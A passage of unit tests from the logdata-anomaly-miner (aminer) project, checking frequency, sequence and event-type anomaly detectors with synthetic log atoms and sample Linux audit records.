MatchElement('/p/id', b'x', b'x', None) p6 = ParserMatch(MatchElement('/p', b'bx', b'bx', [m6_1, m6_2])) log_atom_6 = LogAtom(b'bx', p6, 15, None) m7_1 = MatchElement('/p/value', b'a', b'a', None) m7_2 = 
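MatchElement('/p/id', b'x', b'x', None)
        p7 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m7_1, m7_2]))
        # log_atom_7 now uses its own parser match p7 (it used p4 before; both carry 'ax' by 'x', so the
        # expected results are unchanged, but p7 was otherwise unused)
        log_atom_7 = LogAtom(b'ax', p7, 16, None)
        # Start of window 3:
        m8_1 = MatchElement('/p/value', b'c', b'c', None)
        m8_2 = MatchElement('/p/id', b'x', b'x', None)
        p8 = ParserMatch(MatchElement('/p', b'cx', b'cx', [m8_1, m8_2]))
        log_atom_8 = LogAtom(b'cx', p8, 23, None)
        m9_1 = MatchElement('/p/value', b'b', b'b', None)
        m9_2 = MatchElement('/p/id', b'x', b'x', None)
        p9 = ParserMatch(MatchElement('/p', b'bx', b'bx', [m9_1, m9_2]))
        log_atom_9 = LogAtom(b'bx', p9, 24, None)
        # Start of window 4:
        m10_1 = MatchElement('/p/value', b'a', b'a', None)
        m10_2 = MatchElement('/p/id', b'x', b'x', None)
        p10 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m10_1, m10_2]))
        log_atom_10 = LogAtom(b'ax', p10, 43, None)

        # Forward log atoms to detector
        eccd.receive_atom(log_atom_1)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_2)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_3)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_4)
        # End of first time window; first count vector triggers anomaly for x
        self.assertTrue(test_handler.anomalies)
        # Remove anomaly
        test_handler.anomalies = []
        eccd.receive_atom(log_atom_5)
        # End of first time window; first count vector triggers anomaly for y
        self.assertTrue(test_handler.anomalies)
        # Remove anomaly
        test_handler.anomalies = []
        eccd.receive_atom(log_atom_6)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_7)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_8)
        # No anomaly reported for x since 1 time a and 1 time b (window 1) is similar enough to 2 times a and 1 time b (window 2)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_9)
        self.assertFalse(test_handler.anomalies)
        eccd.receive_atom(log_atom_10)
        # Check learned count vectors at end of third time window
        # For x, the count vectors from the first and third windows are included in the model; for y only the first window
        # (assertEquals is a deprecated alias of assertEqual)
        self.assertEqual(eccd.known_counts, {('x',): [{('a',): 1, ('b',): 1}, {('c',): 1, ('b',): 1}], ('y',): [{('a',): 1}]})
        # Since a occurs in both x and y, its idf factor is only 0.176 (=log10(3/2)),
        # compared to b and c which have an idf factor of 0.477 (=log10(3/1)).
        # Comparing the count vectors for x in the first and third window, we see that
        # a occurs only in first window, which increases diff to 0.176/0.176
        # b occurs once in first and third windows, which updates diff to 0.176/0.653
        # c occurs only in third window, which increases diff to 0.653/1.13
        # The final score is thus 0.653/1.13=0.578, which exceeds the threshold of 0.5.
        self.assertEqual(test_handler.anomalies, [
            {'AnalysisComponent': {'AffectedLogAtomPaths': ['/p/value'], 'AffectedLogAtomFrequencies': [1, 1],
                                   'AffectedIdValues': ['x'], 'AffectedLogAtomValues': [('c',), ('b',)]},
             'CountData': {'ConfidenceFactor': 0.5, 'Confidence': 0.577893478883737}}])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventFrequencyDetectorTest.py000066400000000000000000000226471437606560100314670ustar00rootroot00000000000000
import unittest
from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase


class TestHandler():
    """Dummy anomaly handler that records every received event's data in a list."""

    def __init__(self):
        self.anomalies = []

    # skipcq: PYL-W0613
    def receive_event(self, name, msg, ll, evdat, atom, obj):
        """Receive anomaly information."""
        self.anomalies.append(evdat)


class EventFrequencyDetectorTest(TestBase):
    """Unittests for the EventFrequencyDetector."""

    def test1_normal_frequency_detection(self):
        """
        This test case checks the normal detection of new frequencies.
        The EFD is used with one path to be analyzed over four time windows.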
The frequencies do not change a lot in the first time windows, thus no anomalies are generated. Then, value frequencies change and anomalies are created in the last time windows. """ description = "Test1EventFrequencyDetector" # Initialize detector for analyzing values in one path in time windows of 10 seconds test_handler = TestHandler() event_frequency_detector = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[test_handler], target_path_list=['/value'], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, persistence_id='Default', learn_mode=True, output_logline=False) self.analysis_context.register_component(event_frequency_detector, description) # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. 
# The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: m_1 = MatchElement('/value', b'a', b'a', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'a', parser_match_1, 1, None) m_2 = MatchElement('/value', b'b', b'b', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'b', parser_match_2, 3, None) m_3 = MatchElement('/value', b'a', b'a', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'a', parser_match_3, 7, None) # Start of window 2: m_4 = MatchElement('/value', b'a', b'a', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'a', parser_match_4, 13, None) m_6 = MatchElement('/value', b'b', b'b', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'b', parser_match_6, 17, None) m_7 = MatchElement('/value', b'a', b'a', None) parser_match_7 = ParserMatch(m_7) log_atom_7 = LogAtom(b'a', parser_match_7, 18, None) m_8 = MatchElement('/value', b'a', b'a', None) parser_match_8 = ParserMatch(m_8) log_atom_8 = LogAtom(b'a', parser_match_8, 19, None) # Start of window 3: m_9 = MatchElement('/value', b'b', b'b', None) parser_match_9 = ParserMatch(m_9) log_atom_9 = LogAtom(b'b', parser_match_9, 25, None) m_10 = MatchElement('/value', b'b', b'b', None) parser_match_10 = ParserMatch(m_10) log_atom_10 = LogAtom(b'b', parser_match_10, 25, None) # Start of window 4: m_11 = MatchElement('/value', b'a', b'a', None) parser_match_11 = ParserMatch(m_11) log_atom_11 = LogAtom(b'a', parser_match_11, 35, None) # Forward log atoms to detector # Log atoms of initial window 1 should not create anomalies and add to counts # Input: a; initial time window is started # Expected output: frequency of a is 1 event_frequency_detector.receive_atom(log_atom_1) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [1]}) # 
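Input: b; initial time window is not finished
        # Expected output: frequency of b is 1 added to existing count
        event_frequency_detector.receive_atom(log_atom_2)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [1], ('b',): [1]})

        # Input: a; initial time window is not finished
        # Expected output: frequency of a is 2 replaces a in existing count
        event_frequency_detector.receive_atom(log_atom_3)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2], ('b',): [1]})

        # Time window 2 should not create anomalies since a is in confidence (3 vs 2 occurrences) and b is identical (1 occurrence).
        # Input: a; initial time window is completed, second time window is started
        # Expected output: frequency of a is 1 in new time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_4)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2, 1], ('b',): [1, 0]})

        # Input: b; second time window is not finished
        # Expected output: frequency of b is 1 in new time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_6)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2, 1], ('b',): [1, 1]})

        # Input: a; second time window is not finished
        # Expected output: frequency of a is 2 in new time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_7)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2, 2], ('b',): [1, 1]})

        # Input: a; second time window is not finished
        # Expected output: frequency of a is 3 in new time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_8)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2, 3], ('b',): [1, 1]})

        # Time window 3 should create 2 anomalies since a drops from 3 to 0 and b increases from 1 to 2, which will be reported
        # in window 4. Anomalies are only reported when the third time window is known to be completed, which will occur when
        # a subsequent atom is received.
        # Input: b; second time window is completed, third time window is started
        # Expected output: frequency of b is 1 in new time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_9)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2, 3, 0], ('b',): [1, 1, 1]})

        # Input: b; third time window is not finished
        # Expected output: frequency of b is 2 in new time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_10)
        self.assertFalse(test_handler.anomalies)
        self.assertEqual(event_frequency_detector.counts, {('a',): [2, 3, 0], ('b',): [1, 1, 2]})

        # Time window 4 should not create anomalies since no log atom is received to evaluate it.
        # Input: a; third time window is completed, fourth time window is started
        # Expected output: Anomalies for unexpected counts of a (0 instead of 3) and b (2 instead of 1), frequency of a is 1 in new
        # time window count, old count remains unchanged
        event_frequency_detector.receive_atom(log_atom_11)
        self.assertEqual(test_handler.anomalies, [
            {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['a']},
             'FrequencyData': {'ExpectedLogAtomValuesFrequency': 3.0, 'ExpectedLogAtomValuesFrequencyRange': [1.0, 5.0],
                               'LogAtomValuesFrequency': 0, 'WindowSize': 10, 'ConfidenceFactor': 0.51, 'Confidence': 1.0}},
            {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['b']},
             'FrequencyData': {'ExpectedLogAtomValuesFrequency': 1.0, 'ExpectedLogAtomValuesFrequencyRange': [1.0, 1.0],
                               'LogAtomValuesFrequency': 2, 'WindowSize': 10, 'ConfidenceFactor': 0.51, 'Confidence': 0.5}}])
        self.assertEqual(event_frequency_detector.counts, {('a',): [3, 0,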
1], ('b',): [1, 2, 0]}) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventSequenceDetectorTest.py000066400000000000000000000140031437606560100312630ustar00rootroot00000000000000import unittest from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class EventSequenceDetectorTest(TestBase): """Unittests for the EventSequenceDetectorDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new sequences. The ESD is used to detect value sequences of length 2 and uses one id path to cope with interleaving sequences, i.e., the sequences only make sense when logs that contain the same id are considered. """ description = "Test1EventSequenceDetector" # Initialize detector for sequence length 2 test_handler = TestHandler() event_sequence_detector = EventSequenceDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 2, False, -1, 'Default', True, output_logline=False) self.analysis_context.register_component(event_sequence_detector, description) # Prepare log atoms that represent two users (id) that produce interleaved sequence a, b, c # This means, user with id 1 creates sequence a, b, c, and user with id 2 creates sequence # a, b, however, these sequences are interleaved. The ESD resolves this issue using the id # as an id path (/model/id). The path of the values is /model/value. 
# The following events are generated: # id: 1 value: a # id: 1 value: b # id: 2 value: a # id: 1 value: c # id: 2 value: b m_1 = MatchElement('/model/id', b'1', b'1', None) m_2 = MatchElement('/model/value', b'a', b'a', None) match_element_1 = MatchElement('/model', b'1a', b'1a', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'1a', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'1', b'1', None) m_4 = MatchElement('/model/value', b'b', b'b', None) match_element_2 = MatchElement('/model', b'1b', b'1b', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'1b', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'2', b'2', None) m_6 = MatchElement('/model/value', b'a', b'a', None) match_element_3 = MatchElement('/model', b'2a', b'2a', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'2a', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'1', b'1', None) m_8 = MatchElement('/model/value', b'c', b'c', None) match_element_4 = MatchElement('/model', b'1c', b'1c', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'1c', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'2', b'2', None) m_10 = MatchElement('/model/value', b'b', b'b', None) match_element_5 = MatchElement('/model', b'2b', b'2b', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'2b', parser_match_5, 5, None) # Forward log atoms to detector # Since sequence length is 2, first atom should not have any effect # Input: id: 1 value: a # Expected output: None event_sequence_detector.receive_atom(log_atom_1) self.assertIsNone(test_handler.anomaly) sequences_set = set() self.assertEqual(event_sequence_detector.sequences, sequences_set) # Second log atom should create first sequence # Input: id: 1 value: b # Expected output: New sequence (a, b) detected, added to known sequences event_sequence_detector.receive_atom(log_atom_2) 
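self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [('a',), ('b',)], 'AffectedIdValues': ['1']}}) sequences_set.add((('a',), ('b',))) self.assertEqual(event_sequence_detector.sequences, sequences_set) test_handler.anomaly = None # Next log atom is of different user, should not have any effect # Input: id: 2 value: a # Expected output: None event_sequence_detector.receive_atom(log_atom_3) self.assertIsNone(test_handler.anomaly) self.assertEqual(event_sequence_detector.sequences, sequences_set) # Next log atom is of user with id 1, but new value c, thus new sequence should be generated # Input: id: 1 value: c # Expected output: New sequence (b, c) detected, added to known sequences event_sequence_detector.receive_atom(log_atom_4) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [('b',), ('c',)], 'AffectedIdValues': ['1']}}) sequences_set.add((('b',), ('c',))) self.assertEqual(event_sequence_detector.sequences, sequences_set) test_handler.anomaly = None # Next log atom is of user with id 2, but sequence a, b is already known from user with id 1, thus no effect # Input: id: 2 value: b # Expected output: None event_sequence_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) self.assertEqual(event_sequence_detector.sequences, sequences_set) if __name__ == "__main__": unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventTypeDetectorTest.py000066400000000000000000000357141437606560100304500ustar00rootroot00000000000000
import time
import unittest
from aminer.analysis.EventTypeDetector import EventTypeDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.ParserMatch import ParserMatch
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase


class EventTypeDetectorTest(TestBase):
    """
    Unittests for the EventTypeDetector.

    The fixture is a short Linux audit log (SYSCALL / PATH records) plus a parser model
    that recognises exactly those two record types; every test feeds the parsed atoms
    to a freshly created detector.
    """

    # Sample audit records. Adjacent byte literals are concatenated by the interpreter.
    log_lines = [
        b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1'
        b' ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)',
        b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 '
        b'nametype=NORMAL',
        b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 '
        b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 '
        b'comm="apache2" exe="/usr/sbin/apache2" key=(null)']

    # Parser: a PATH record branch and a SYSCALL record branch. The SYSCALL branch swallows
    # everything after 'exit=' into one AnyByteDataModelElement.
    parsing_model = FirstMatchModelElement('type', [
        SequenceModelElement('path', [
            FixedDataModelElement('type', b'type=PATH '),
            FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'),
            FixedDataModelElement('placeholder', b':'),
            DecimalIntegerValueModelElement('id'),
            FixedDataModelElement('item_string', b'): item='),
            DecimalIntegerValueModelElement('item'),
            FixedDataModelElement('name_string', b' name="'),
            DelimitedDataModelElement('name', b'"'),
            FixedDataModelElement('inode_string', b'" inode='),
            DecimalIntegerValueModelElement('inode'),
            FixedDataModelElement('dev_string', b' dev='),
            DelimitedDataModelElement('dev', b' '),
            FixedDataModelElement('mode_string', b' mode='),
            DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO),
            FixedDataModelElement('ouid_string', b' ouid='),
            DecimalIntegerValueModelElement('ouid'),
            FixedDataModelElement('ogid_string', b' ogid='),
            DecimalIntegerValueModelElement('ogid'),
            FixedDataModelElement('rdev_string', b' rdev='),
            DelimitedDataModelElement('rdev', b' '),
            FixedDataModelElement('nametype_string', b' nametype='),
            FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]),
        SequenceModelElement('syscall', [
            FixedDataModelElement('type', b'type=SYSCALL '),
            FixedDataModelElement('msg_audit', b'msg=audit('),
            DelimitedDataModelElement('msg', b':'),
            FixedDataModelElement('placeholder', b':'),
            DecimalIntegerValueModelElement('id'),
            FixedDataModelElement('arch_string', b'): arch='),
            DelimitedDataModelElement('arch', b' '),
            FixedDataModelElement('syscall_string', b' syscall='),
            DecimalIntegerValueModelElement('syscall'),
            FixedDataModelElement('success_string', b' success='),
            FixedWordlistDataModelElement('success', [b'yes', b'no']),
            FixedDataModelElement('exit_string', b' exit='),
            DecimalIntegerValueModelElement('exit'),
            AnyByteDataModelElement('remainding_data')])])

    def _build_log_atoms(self):
        """Parse every entry of log_lines with parsing_model and wrap it in a LogAtom (shared by test1 and test2)."""
        log_atoms = []
        for line in self.log_lines:
            t = time.time()
            parser_match = ParserMatch(self.parsing_model.get_match_element('parser', MatchContext(line)))
            log_atoms.append(LogAtom(line, parser_match, t, self.__class__.__name__))
        return log_atoms

    def test1receive_atoms_with_default_values(self):
        """
        Receive all sample atoms with a detector created with default arguments.

        target_path_list is empty, so every atom must be accepted and total_records must
        grow by one per atom.
        """
        event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        for i, log_atom in enumerate(self._build_log_atoms()):
            self.assertTrue(event_type_detector.receive_atom(log_atom))
            self.assertEqual(event_type_detector.total_records, i + 1)

    def test2receive_atoms_with_defined_path_list(self):
        """
        Receive all sample atoms with target_path_list restricted to the PATH record's nametype.

        results[i] is True where the atom is expected to be rejected: receive_atom must then
        return False and the detector's counters (num_events, num_event_lines, total_records,
        longest_path) must be unchanged.
        """
        event_type_detector = EventTypeDetector(
            self.aminer_config, [self.stream_printer_event_handler], target_path_list=['parser/type/path/nametype'])
        results = [True, False, True, False, True, False, True, True, False, False, True, True, False, True, False, True, False, True, False,
                   False, True]
        for i, log_atom in enumerate(self._build_log_atoms()):
            old_vals = (event_type_detector.num_events, event_type_detector.num_event_lines, event_type_detector.total_records,
                        event_type_detector.longest_path)
            self.assertEqual(event_type_detector.receive_atom(log_atom), not results[i], i)
            if results[i]:
                self.assertEqual(old_vals, (
                    event_type_detector.num_events, event_type_detector.num_event_lines, event_type_detector.total_records,
                    event_type_detector.longest_path))

    def test3append_values_float(self):
        """Check append_values with a numeric raw match object (float and int) and with a numeric byte string."""
        event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        # initialize all values.
        t = time.time()
        log_atom = LogAtom(b'22.2', ParserMatch(MatchElement('path', b'22.2', 22.2, None)), t, self.__class__.__name__)
        event_type_detector.receive_atom(log_atom)
        event_type_detector.values = [[[]]]
        event_type_detector.append_values(log_atom, 0)
        self.assertEqual(event_type_detector.values, [[[22.2]]])

        log_atom = LogAtom(b'22', ParserMatch(MatchElement('path', b'22', 22, None)), t, self.__class__.__name__)
        event_type_detector.values = [[[]]]
        event_type_detector.append_values(log_atom, 0)
        self.assertEqual(event_type_detector.values, [[[22]]])

        # raw match object is the byte string b'22'; the numeric value is expected to be appended.
        log_atom = LogAtom(b'22.2', ParserMatch(MatchElement('path', b'22', b'22', None)), t, self.__class__.__name__)
        event_type_detector.values = [[[]]]
        event_type_detector.append_values(log_atom, 0)
        self.assertEqual(event_type_detector.values, [[[22]]])

    def test4append_values_bytestring(self):
        """
        Check append_values with a non-numeric byte string as raw match object.

        This should trigger a ValueError internally and append the decoded match string instead.
        """
        event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        # initialize all values.
        t = time.time()
        log_atom = LogAtom(b'This is a string', ParserMatch(
            MatchElement('path', b'This is a string', b'This is a string', None)), t, self.__class__.__name__)
        event_type_detector.receive_atom(log_atom)
        event_type_detector.values = [[[]]]
        event_type_detector.append_values(log_atom, 0)
        self.assertEqual(event_type_detector.values, [[['This is a string']]])

        log_atom = LogAtom(b'24.05.', ParserMatch(MatchElement('path', b'24.05.', b'24.05.', None)), t, self.__class__.__name__)
        event_type_detector.values = [[[]]]
        event_type_detector.append_values(log_atom, 0)
        self.assertEqual(event_type_detector.values, [[['24.05.']]])

    def test5check_value_reduction(self):
        """
        Check that the stored values are reduced once more than max_num_vals values were received.

        After exactly max_num_vals atoms the full list is kept; the next atom must shrink the
        list to its last min_num_vals entries.
        """
        event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        t = time.time()
        val_list = [[[]]]
        for i in range(1, event_type_detector.max_num_vals + 1, 1):
            log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement('path', str(i).encode(), i, None)), t, self.__class__.__name__)
            val_list[0][0].append(float(i))
            self.assertTrue(event_type_detector.receive_atom(log_atom))
            self.assertEqual(event_type_detector.values, val_list)
        # One value beyond the threshold; computed explicitly instead of reusing the leaked loop variable.
        i = event_type_detector.max_num_vals + 1
        log_atom = LogAtom(str(i).encode(), ParserMatch(MatchElement('path', str(i).encode(), i, None)), t, self.__class__.__name__)
        val_list[0][0].append(float(i))
        self.assertTrue(event_type_detector.receive_atom(log_atom))
        self.assertEqual(event_type_detector.values, [[val_list[0][0][-event_type_detector.min_num_vals:]]])

    def test6persist_and_load_data(self):
        """Persist a detector's state and check that a newly created detector loads the same state."""
        event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        t = time.time()
        log_atom = LogAtom(b'22.2', ParserMatch(MatchElement('path', b'22.2', 22.2, None)), t, self.__class__.__name__)
        event_type_detector.receive_atom(log_atom)
        event_type_detector.do_persist()

        event_type_detector_loaded = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        self.assertEqual(event_type_detector.variable_key_list, event_type_detector_loaded.variable_key_list)
        self.assertEqual(event_type_detector.values, event_type_detector_loaded.values)
        self.assertEqual(event_type_detector.longest_path, event_type_detector_loaded.longest_path)
        self.assertEqual(event_type_detector.check_variables, event_type_detector_loaded.check_variables)
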